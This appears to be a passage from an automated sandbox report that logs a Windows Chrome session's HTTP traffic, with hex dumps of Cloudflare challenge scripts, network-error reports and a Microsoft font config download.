                                                      If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
                                                      Range: bytes=0-2147483646
                                                      User-Agent: Microsoft BITS/7.8
                                                      Host: fs.microsoft.com
                                                      2024-03-05 13:23:16 UTC455INHTTP/1.1 200 OK
                                                      ApiVersion: Distribute 1.1
                                                      Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                      Content-Type: application/octet-stream
                                                      ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                      Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                      Server: ECAcc (chd/0778)
                                                      X-CID: 11
                                                      Cache-Control: public, max-age=21749
                                                      Date: Tue, 05 Mar 2024 13:23:16 GMT
                                                      Content-Length: 55
                                                      Connection: close
                                                      X-CID: 2
                                                      2024-03-05 13:23:16 UTC55INData Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
                                                      Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      5192.168.2.449740104.21.81.2294434632C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-03-05 13:23:16 UTC939OUTGET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_page/v1?ray=85fa6b69aed817b1 HTTP/1.1
                                                      Host: ampvance.com
                                                      Connection: keep-alive
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      sec-ch-ua-mobile: ?0
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      sec-ch-ua-arch: "x86"
                                                      sec-ch-ua-full-version: "117.0.5938.132"
                                                      sec-ch-ua-platform-version: "10.0.0"
                                                      sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"
                                                      sec-ch-ua-bitness: "64"
                                                      sec-ch-ua-model: ""
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept: */*
                                                      Sec-Fetch-Site: same-origin
                                                      Sec-Fetch-Mode: no-cors
                                                      Sec-Fetch-Dest: script
                                                      Referer: https://ampvance.com/?__cf_chl_rt_tk=3yAfPjzz9mWgpHVStS6F4iNx.u6TsGuIonpQn1.luEg-1709644996-0.0.1.1-1557
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2024-03-05 13:23:16 UTC666INHTTP/1.1 200 OK
                                                      Date: Tue, 05 Mar 2024 13:23:16 GMT
                                                      Content-Type: application/javascript; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Dx7j2FW27EtT340Z7pU8O%2FB3tPvAan7%2F%2B94cXGMRjf0zeZDZRB0NI06mwwdGnUWwDU%2FasOD8l%2BkFTjDlyA4kcmin34lpOekV%2BrSTQ0h46Q7iWxtIF%2FIpu16pPu9%2FssE%3D"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                      Server: cloudflare
                                                      CF-RAY: 85fa6b6c5c455e7f-EWR
                                                      alt-svc: h3=":443"; ma=86400
                                                      2024-03-05 13:23:16 UTC703INData Raw: 37 64 31 38 0d 0a 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 53 52 3d 74 72 75 65 3b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 4f 3d 66 61 6c 73 65 3b 7e 66 75 6e 63 74 69 6f 6e 28 69 6f 2c 66 7a 2c 66 41 2c 66 47 2c 66 49 2c 66 50 2c 66 54 2c 66 55 2c 67 69 2c 67 6f 2c 67 71 2c 67 72 2c 67 73 2c 67 74 2c 67 75 2c 67 76 2c 67 77 2c 67 78 2c 67 79 2c 67 7a 2c 67 41 2c 67 42 2c 67 43 2c 67 44 2c 67 45 2c 67 46 2c 67 47 2c 67 48 2c 67 49 2c 67 4a 2c 67 4b 2c 67 4c 2c 67 4d 2c 67 4e 2c 67 4f 2c 67 50 2c 67 51 2c 67 52 2c 67 53 2c 67 54 2c 67 55 2c 67 56 2c 67 57 2c 67 58 2c 67 59 2c 67 5a 2c 68 30 2c 68 31 2c 68 32 2c 68 33 2c 68 34 2c 68 35 2c 68 36 2c 68 37 2c 68 38 2c 68 39 2c 68 61 2c 68 62 2c 68 63 2c 68 64 2c 68
                                                      Data Ascii: 7d18window._cf_chl_opt.uaSR=true;window._cf_chl_opt.uaO=false;~function(io,fz,fA,fG,fI,fP,fT,fU,gi,go,gq,gr,gs,gt,gu,gv,gw,gx,gy,gz,gA,gB,gC,gD,gE,gF,gG,gH,gI,gJ,gK,gL,gM,gN,gO,gP,gQ,gR,gS,gT,gU,gV,gW,gX,gY,gZ,h0,h1,h2,h3,h4,h5,h6,h7,h8,h9,ha,hb,hc,hd,h
                                                      2024-03-05 13:23:16 UTC1369INData Raw: 69 6f 28 33 33 36 29 5d 2c 66 47 3d 30 2c 66 7a 5b 69 6f 28 37 30 39 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 69 79 2c 63 29 7b 69 79 3d 69 6f 2c 63 3d 7b 27 6d 6f 46 69 79 27 3a 66 75 6e 63 74 69 6f 6e 28 64 2c 65 29 7b 72 65 74 75 72 6e 20 64 28 65 29 7d 7d 2c 63 5b 69 79 28 31 37 37 30 29 5d 28 63 6c 65 61 72 54 69 6d 65 6f 75 74 2c 66 47 29 2c 66 7a 5b 69 79 28 31 39 37 31 29 5d 3d 21 21 5b 5d 7d 2c 66 7a 5b 69 6f 28 31 30 37 35 29 5d 3d 21 5b 5d 2c 66 7a 5b 69 6f 28 32 33 35 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 69 44 29 7b 69 66 28 69 44 3d 69 6f 2c 66 7a 5b 69 44 28 31 30 37 35 29 5d 29 72 65 74 75 72 6e 3b 66 7a 5b 69 44 28 31 30 37 35 29 5d 3d 21 21 5b 5d 7d 2c 66 49 3d 30 2c 66 4c 28 29 2c 66 7a 5b 69 6f 28 37 36 31 29 5d 3d 66 75 6e 63 74 69 6f 6e 28
                                                      Data Ascii: io(336)],fG=0,fz[io(709)]=function(iy,c){iy=io,c={'moFiy':function(d,e){return d(e)}},c[iy(1770)](clearTimeout,fG),fz[iy(1971)]=!![]},fz[io(1075)]=![],fz[io(235)]=function(iD){if(iD=io,fz[iD(1075)])return;fz[iD(1075)]=!![]},fI=0,fL(),fz[io(761)]=function(
                                                      2024-03-05 13:23:16 UTC1369INData Raw: 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 28 69 29 7d 2c 27 57 41 51 71 68 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 7c 69 7d 2c 27 54 45 5a 66 56 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 2d 69 7d 2c 27 61 57 70 75 76 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 3d 3d 68 7d 2c 27 4f 61 48 70 4f 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 21 3d 3d 68 7d 2c 27 79 49 6b 65 47 27 3a 6a 44 28 34 38 35 29 2c 27 46 72 4d 62 76 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 21 3d 68 7d 2c 27 58 68 42 5a 52 27 3a 6a 44 28 37 38 34 29 2c 27 75 61 79 6b 75 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72
                                                      Data Ascii: unction(h,i){return h(i)},'WAQqh':function(h,i){return h|i},'TEZfV':function(h,i){return h-i},'aWpuv':function(h,i){return i==h},'OaHpO':function(h,i){return i!==h},'yIkeG':jD(485),'FrMbv':function(h,i){return i!=h},'XhBZR':jD(784),'uayku':function(h,i){r
                                                      2024-03-05 13:23:16 UTC1369INData Raw: 63 74 69 6f 6e 28 4f 2c 50 2c 6a 49 29 7b 72 65 74 75 72 6e 20 6a 49 3d 62 2c 64 5b 6a 49 28 31 32 30 35 29 5d 28 4f 2c 50 29 7d 2c 27 65 73 4a 78 57 27 3a 66 75 6e 63 74 69 6f 6e 28 4f 2c 50 29 7b 72 65 74 75 72 6e 20 4f 5e 50 7d 2c 27 76 71 56 65 54 27 3a 66 75 6e 63 74 69 6f 6e 28 4f 2c 50 29 7b 72 65 74 75 72 6e 20 50 5e 4f 7d 7d 2c 69 3d 3d 6e 75 6c 6c 29 72 65 74 75 72 6e 27 27 3b 66 6f 72 28 42 3d 7b 7d 2c 43 3d 7b 7d 2c 44 3d 27 27 2c 45 3d 32 2c 46 3d 33 2c 47 3d 32 2c 48 3d 5b 5d 2c 49 3d 30 2c 4a 3d 30 2c 4b 3d 30 3b 64 5b 6a 4a 28 39 33 39 29 5d 28 4b 2c 69 5b 6a 4a 28 31 36 36 35 29 5d 29 3b 4b 2b 3d 31 29 69 66 28 4c 3d 69 5b 6a 4a 28 31 30 36 39 29 5d 28 4b 29 2c 4f 62 6a 65 63 74 5b 6a 4a 28 37 38 37 29 5d 5b 6a 4a 28 34 38 39 29 5d 5b 6a
                                                      Data Ascii: ction(O,P,jI){return jI=b,d[jI(1205)](O,P)},'esJxW':function(O,P){return O^P},'vqVeT':function(O,P){return P^O}},i==null)return'';for(B={},C={},D='',E=2,F=3,G=2,H=[],I=0,J=0,K=0;d[jJ(939)](K,i[jJ(1665)]);K+=1)if(L=i[jJ(1069)](K),Object[jJ(787)][jJ(489)][j
                                                      2024-03-05 13:23:16 UTC1369INData Raw: 78 2c 47 29 3b 49 3d 4e 7c 49 3c 3c 31 2e 30 36 2c 6a 2d 31 3d 3d 4a 3f 28 4a 3d 30 2c 48 5b 6a 4a 28 32 35 31 29 5d 28 64 5b 6a 4a 28 31 36 30 33 29 5d 28 6f 2c 49 29 29 2c 49 3d 30 29 3a 4a 2b 2b 2c 4e 3d 30 2c 78 2b 2b 29 3b 66 6f 72 28 4e 3d 44 5b 6a 4a 28 34 33 38 29 5d 28 30 29 2c 78 3d 30 3b 31 36 3e 78 3b 49 3d 64 5b 6a 4a 28 31 33 32 32 29 5d 28 64 5b 6a 4a 28 35 37 31 29 5d 28 49 2c 31 29 2c 31 2e 32 38 26 4e 29 2c 64 5b 6a 4a 28 31 38 32 32 29 5d 28 4a 2c 6a 2d 31 29 3f 28 4a 3d 30 2c 48 5b 6a 4a 28 32 35 31 29 5d 28 64 5b 6a 4a 28 31 36 30 33 29 5d 28 6f 2c 49 29 29 2c 49 3d 30 29 3a 4a 2b 2b 2c 4e 3e 3e 3d 31 2c 78 2b 2b 29 3b 7d 45 2d 2d 2c 64 5b 6a 4a 28 31 38 32 32 29 5d 28 30 2c 45 29 26 26 28 45 3d 4d 61 74 68 5b 6a 4a 28 31 30 32 35 29
                                                      Data Ascii: x,G);I=N|I<<1.06,j-1==J?(J=0,H[jJ(251)](d[jJ(1603)](o,I)),I=0):J++,N=0,x++);for(N=D[jJ(438)](0),x=0;16>x;I=d[jJ(1322)](d[jJ(571)](I,1),1.28&N),d[jJ(1822)](J,j-1)?(J=0,H[jJ(251)](d[jJ(1603)](o,I)),I=0):J++,N>>=1,x++);}E--,d[jJ(1822)](0,E)&&(E=Math[jJ(1025)
                                                      2024-03-05 13:23:16 UTC1369INData Raw: 29 7b 72 65 74 75 72 6e 20 6a 4b 3d 6a 44 2c 64 5b 6a 4b 28 36 30 32 29 5d 28 6a 4b 28 31 38 36 35 29 2c 64 5b 6a 4b 28 38 39 37 29 5d 29 3f 64 5b 6a 4b 28 38 39 35 29 5d 28 6e 75 6c 6c 2c 68 29 3f 27 27 3a 27 27 3d 3d 68 3f 6e 75 6c 6c 3a 66 2e 69 28 68 5b 6a 4b 28 31 36 36 35 29 5d 2c 33 32 37 36 38 2c 66 75 6e 63 74 69 6f 6e 28 69 2c 6a 4c 29 7b 72 65 74 75 72 6e 20 6a 4c 3d 6a 4b 2c 68 5b 6a 4c 28 34 33 38 29 5d 28 69 29 7d 29 3a 64 5b 6a 4b 28 31 32 34 36 29 5d 5b 6a 4b 28 31 38 37 39 29 5d 7d 2c 27 69 27 3a 66 75 6e 63 74 69 6f 6e 28 69 2c 6a 2c 6f 2c 6a 4d 2c 73 2c 78 2c 42 2c 43 2c 44 2c 45 2c 46 2c 47 2c 48 2c 49 2c 4a 2c 4b 2c 4f 2c 4c 2c 4d 2c 4e 29 7b 66 6f 72 28 6a 4d 3d 6a 44 2c 73 3d 5b 5d 2c 78 3d 34 2c 42 3d 34 2c 43 3d 33 2c 44 3d 5b 5d
                                                      Data Ascii: ){return jK=jD,d[jK(602)](jK(1865),d[jK(897)])?d[jK(895)](null,h)?'':''==h?null:f.i(h[jK(1665)],32768,function(i,jL){return jL=jK,h[jL(438)](i)}):d[jK(1246)][jK(1879)]},'i':function(i,j,o,jM,s,x,B,C,D,E,F,G,H,I,J,K,O,L,M,N){for(jM=jD,s=[],x=4,B=4,C=3,D=[]
                                                      2024-03-05 13:23:16 UTC1369INData Raw: 29 2a 46 2c 46 3c 3c 3d 31 29 3b 73 5b 42 2b 2b 5d 3d 65 28 4a 29 2c 4f 3d 42 2d 31 2c 78 2d 2d 3b 62 72 65 61 6b 3b 63 61 73 65 20 32 3a 72 65 74 75 72 6e 20 44 5b 6a 4d 28 31 39 36 31 29 5d 28 27 27 29 7d 69 66 28 78 3d 3d 30 26 26 28 78 3d 4d 61 74 68 5b 6a 4d 28 31 30 32 35 29 5d 28 32 2c 43 29 2c 43 2b 2b 29 2c 73 5b 4f 5d 29 4f 3d 73 5b 4f 5d 3b 65 6c 73 65 20 69 66 28 64 5b 6a 4d 28 31 34 34 31 29 5d 28 4f 2c 42 29 29 4f 3d 64 5b 6a 4d 28 39 37 38 29 5d 28 45 2c 45 5b 6a 4d 28 31 30 36 39 29 5d 28 30 29 29 3b 65 6c 73 65 20 72 65 74 75 72 6e 20 6e 75 6c 6c 3b 44 5b 6a 4d 28 32 35 31 29 5d 28 4f 29 2c 73 5b 42 2b 2b 5d 3d 45 2b 4f 5b 6a 4d 28 31 30 36 39 29 5d 28 30 29 2c 78 2d 2d 2c 45 3d 4f 2c 64 5b 6a 4d 28 39 36 31 29 5d 28 30 2c 78 29 26 26 28
                                                      Data Ascii: )*F,F<<=1);s[B++]=e(J),O=B-1,x--;break;case 2:return D[jM(1961)]('')}if(x==0&&(x=Math[jM(1025)](2,C),C++),s[O])O=s[O];else if(d[jM(1441)](O,B))O=d[jM(978)](E,E[jM(1069)](0));else return null;D[jM(251)](O),s[B++]=E+O[jM(1069)](0),x--,E=O,d[jM(961)](0,x)&&(
                                                      2024-03-05 13:23:16 UTC1369INData Raw: 38 38 29 2c 6a 53 28 33 34 34 29 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 36 27 3a 73 5b 6a 53 28 34 37 39 29 5d 3d 32 35 30 30 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 37 27 3a 73 5b 6a 53 28 39 34 38 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 38 27 3a 73 3d 6e 65 77 20 66 7a 5b 28 6a 53 28 31 32 30 39 29 29 5d 28 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 39 27 3a 78 3d 6a 5b 6a 53 28 31 32 30 30 29 5d 28 6a 5b 6a 53 28 35 35 36 29 5d 28 6a 5b 6a 53 28 31 37 32 35 29 5d 28 6a 53 28 31 37 36 33 29 2b 43 2c 6a 53 28 39 30 39 29 29 2b 31 2b 6a 53 28 38 37 30 29 2b 66 7a 5b 6a 53 28 31 32 34 36 29 5d 5b 6a 53 28 31 35 38 39 29 5d 2b 27 2f 27 2b 66 7a 5b 6a 53 28 31 32 34 36 29 5d 5b 6a 53 28 32
                                                      Data Ascii: 88),jS(344));continue;case'6':s[jS(479)]=2500;continue;case'7':s[jS(948)]=function(){};continue;case'8':s=new fz[(jS(1209))]();continue;case'9':x=j[jS(1200)](j[jS(556)](j[jS(1725)](jS(1763)+C,jS(909))+1+jS(870)+fz[jS(1246)][jS(1589)]+'/'+fz[jS(1246)][jS(2
                                                      2024-03-05 13:23:16 UTC1369INData Raw: 27 3a 66 75 6e 63 74 69 6f 6e 28 6c 2c 6d 29 7b 72 65 74 75 72 6e 20 6c 3d 3d 3d 6d 7d 2c 27 51 70 4d 43 70 27 3a 66 75 6e 63 74 69 6f 6e 28 6c 2c 6d 29 7b 72 65 74 75 72 6e 20 6c 28 6d 29 7d 2c 27 47 48 43 76 44 27 3a 66 75 6e 63 74 69 6f 6e 28 6c 2c 6d 29 7b 72 65 74 75 72 6e 20 6d 21 3d 6c 7d 2c 27 6a 53 5a 63 76 27 3a 66 75 6e 63 74 69 6f 6e 28 6c 2c 6d 29 7b 72 65 74 75 72 6e 20 6c 28 6d 29 7d 2c 27 68 4e 4f 4b 64 27 3a 6a 59 28 31 39 39 37 29 2c 27 45 4f 44 7a 6e 27 3a 66 75 6e 63 74 69 6f 6e 28 6c 2c 6d 29 7b 72 65 74 75 72 6e 20 6c 2b 6d 7d 2c 27 61 65 73 46 62 27 3a 66 75 6e 63 74 69 6f 6e 28 6c 2c 6d 29 7b 72 65 74 75 72 6e 20 6c 2b 6d 7d 7d 2c 65 3d 65 7c 7c 30 2c 65 3e 3d 35 29 72 65 74 75 72 6e 20 76 6f 69 64 20 66 7a 5b 6a 59 28 31 36 30 34
                                                      Data Ascii: ':function(l,m){return l===m},'QpMCp':function(l,m){return l(m)},'GHCvD':function(l,m){return m!=l},'jSZcv':function(l,m){return l(m)},'hNOKd':jY(1997),'EODzn':function(l,m){return l+m},'aesFb':function(l,m){return l+m}},e=e||0,e>=5)return void fz[jY(1604
                                                      2024-03-05 13:23:16 UTC1369INData Raw: 5b 6b 31 28 34 39 34 29 5d 26 26 42 28 64 29 29 7d 2c 6b 3d 67 69 5b 6a 59 28 31 36 30 38 29 5d 28 4a 53 4f 4e 5b 6a 59 28 31 38 32 31 29 5d 28 64 29 29 5b 6a 59 28 35 31 33 29 5d 28 27 2b 27 2c 6a 59 28 36 31 33 29 29 2c 69 5b 6a 59 28 38 36 39 29 5d 28 66 5b 6a 59 28 35 37 30 29 5d 28 66 5b 6a 59 28 35 37 30 29 5d 28 66 5b 6a 59 28 31 35 39 36 29 5d 28 27 76 5f 27 2c 66 7a 5b 6a 59 28 31 32 34 36 29 5d 5b 6a 59 28 31 35 38 39 29 5d 29 2c 27 3d 27 29 2c 6b 29 29 7d 2c 67 6f 3d 7b 7d 2c 67 6f 5b 69 6f 28 31 38 37 30 29 5d 3d 67 6e 2c 66 7a 5b 69 6f 28 35 38 30 29 5d 3d 67 6f 2c 67 71 3d 7b 7d 2c 67 71 5b 69 6f 28 31 36 37 33 29 5d 3d 69 6f 28 33 35 31 29 2c 67 71 5b 69 6f 28 31 36 35 34 29 5d 3d 69 6f 28 31 39 33 38 29 2c 67 71 5b 69 6f 28 39 34 37 29 5d
                                                      Data Ascii: [k1(494)]&&B(d))},k=gi[jY(1608)](JSON[jY(1821)](d))[jY(513)]('+',jY(613)),i[jY(869)](f[jY(570)](f[jY(570)](f[jY(1596)]('v_',fz[jY(1246)][jY(1589)]),'='),k))},go={},go[io(1870)]=gn,fz[io(580)]=go,gq={},gq[io(1673)]=io(351),gq[io(1654)]=io(1938),gq[io(947)]


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      6192.168.2.44974335.190.80.14434632C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-03-05 13:23:16 UTC527OUTOPTIONS /report/v3?s=2mf8xaZkZKjsOfK2ulW9AE0aKQkzRdwMK5ldITE2N8XTB%2B8k6mGqsrrXokklGBcNnJuj7OvyIwrXYnnE1bym%2BknWxe8bCFnop4KTmyGoeor7PN6XWVfJac2XwwSOapY%3D HTTP/1.1
                                                      Host: a.nel.cloudflare.com
                                                      Connection: keep-alive
                                                      Origin: https://ampvance.com
                                                      Access-Control-Request-Method: POST
                                                      Access-Control-Request-Headers: content-type
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2024-03-05 13:23:16 UTC336INHTTP/1.1 200 OK
                                                      Content-Length: 0
                                                      access-control-max-age: 86400
                                                      access-control-allow-methods: OPTIONS, POST
                                                      access-control-allow-origin: *
                                                      access-control-allow-headers: content-length, content-type
                                                      date: Tue, 05 Mar 2024 13:23:16 GMT
                                                      Via: 1.1 google
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Connection: close


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      7192.168.2.44974435.190.80.14434632C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-03-05 13:23:17 UTC472OUTPOST /report/v3?s=2mf8xaZkZKjsOfK2ulW9AE0aKQkzRdwMK5ldITE2N8XTB%2B8k6mGqsrrXokklGBcNnJuj7OvyIwrXYnnE1bym%2BknWxe8bCFnop4KTmyGoeor7PN6XWVfJac2XwwSOapY%3D HTTP/1.1
                                                      Host: a.nel.cloudflare.com
                                                      Connection: keep-alive
                                                      Content-Length: 429
                                                      Content-Type: application/reports+json
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2024-03-05 13:23:17 UTC429OUTData Raw: 5b 7b 22 61 67 65 22 3a 32 36 36 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 35 39 33 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 68 74 74 70 73 3a 2f 2f 72 66 70 63 65 72 74 73 74 72 65 61 6d 2e 63 61 73 74 6c 65 68 69 6c 6c 69 6e 66 6f 74 65 63 68 2e 63 6f 6d 2f 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 30 34 2e 32 31 2e 38 31 2e 32 32 39 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 34 30 33 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 65 72 72 6f 72 22 7d 2c 22 74 79 70 65 22 3a
                                                      Data Ascii: [{"age":266,"body":{"elapsed_time":593,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"https://rfpcertstream.castlehillinfotech.com/","sampling_fraction":1.0,"server_ip":"104.21.81.229","status_code":403,"type":"http.error"},"type":
                                                      2024-03-05 13:23:17 UTC168INHTTP/1.1 200 OK
                                                      Content-Length: 0
                                                      date: Tue, 05 Mar 2024 13:23:17 GMT
                                                      Via: 1.1 google
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Connection: close


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      8192.168.2.449746104.21.81.2294434632C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-03-05 13:23:17 UTC1048OUTPOST /cdn-cgi/challenge-platform/h/g/flow/ov1/1934419278:1709641400:nf2d9uXBpqI_eJS2Oi0Ck7HqLPnuP008yVnwRQOaiCc/85fa6b69aed817b1/8a01f925e609515 HTTP/1.1
                                                      Host: ampvance.com
                                                      Connection: keep-alive
                                                      Content-Length: 1854
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      sec-ch-ua-mobile: ?0
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      sec-ch-ua-arch: "x86"
                                                      Content-type: application/x-www-form-urlencoded
                                                      sec-ch-ua-full-version: "117.0.5938.132"
                                                      sec-ch-ua-platform-version: "10.0.0"
                                                      sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"
                                                      sec-ch-ua-bitness: "64"
                                                      sec-ch-ua-model: ""
                                                      CF-Challenge: 8a01f925e609515
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept: */*
                                                      Origin: https://ampvance.com
                                                      Sec-Fetch-Site: same-origin
                                                      Sec-Fetch-Mode: cors
                                                      Sec-Fetch-Dest: empty
                                                      Referer: https://ampvance.com/
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2024-03-05 13:23:17 UTC1854OUTData Raw: 76 5f 38 35 66 61 36 62 36 39 61 65 64 38 31 37 62 31 3d 72 77 6f 6b 53 6b 73 6b 24 6b 6b 6b 6d 6b 4e 6c 5a 25 32 62 6c 5a 49 41 6f 66 52 4c 55 4a 55 6e 24 5a 36 30 5a 52 2d 6b 6e 49 61 5a 41 33 2d 45 77 52 55 4f 6f 5a 46 5a 5a 41 6f 52 4c 62 58 73 5a 63 6b 44 77 5a 2b 2b 5a 44 35 5a 4a 63 56 64 75 5a 4c 6b 45 43 69 70 5a 44 74 45 49 38 4f 62 6f 45 34 6e 5a 44 75 5a 55 6c 54 64 51 65 5a 57 2d 5a 76 5a 2b 65 48 68 75 62 55 74 74 45 49 78 73 2d 5a 42 52 65 43 5a 6e 35 72 4e 52 2b 41 45 4f 48 44 6e 37 56 6b 45 4c 33 6b 6e 79 6e 6f 6f 5a 69 4c 77 5a 2d 6b 45 55 43 45 52 4f 78 6b 45 61 5a 55 51 58 56 2d 24 4c 4d 52 41 79 44 63 65 65 63 5a 6b 6c 44 45 6e 56 6f 50 5a 64 66 4c 65 73 78 46 6e 77 71 6b 45 30 6c 4f 6a 69 61 4a 6d 37 6c 4b 4e 67 33 2b 6f 5a 72 6b 6e
                                                      Data Ascii: v_85fa6b69aed817b1=rwokSksk$kkkmkNlZ%2blZIAofRLUJUn$Z60ZR-knIaZA3-EwRUOoZFZZAoRLbXsZckDwZ++ZD5ZJcVduZLkECipZDtEI8OboE4nZDuZUlTdQeZW-ZvZ+eHhubUttEIxs-ZBReCZn5rNR+AEOHDn7VkEL3knynooZiLwZ-kEUCEROxkEaZUQXV-$LMRAyDceecZklDEnVoPZdfLesxFnwqkE0lOjiaJm7lKNg3+oZrkn
                                                      2024-03-05 13:23:17 UTC646INHTTP/1.1 200 OK
                                                      Date: Tue, 05 Mar 2024 13:23:17 GMT
                                                      Content-Type: text/plain; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      cf-chl-gen: rhe991SUGbfP4sD871T2IiozjnQ1hd9Qyvh+wJlZkQibr+nGS4NbSaA9aT7xRPci$/83FJTKis8gr33V04SYtyQ==
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ZYiqEm6%2BTG8L1raMT0cqCdrQYTn3d7PlQeRQ7GQVwH9tAoEym%2FPCwrmkJUnPHryNbeAghRY4WjLGcpz0s8e1mI7rSfMkYUqZORIDbFpwtuTV6YnMDaCv77J8i3vUWZ0%3D"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                      Server: cloudflare
                                                      CF-RAY: 85fa6b722af641db-EWR
                                                      alt-svc: h3=":443"; ma=86400
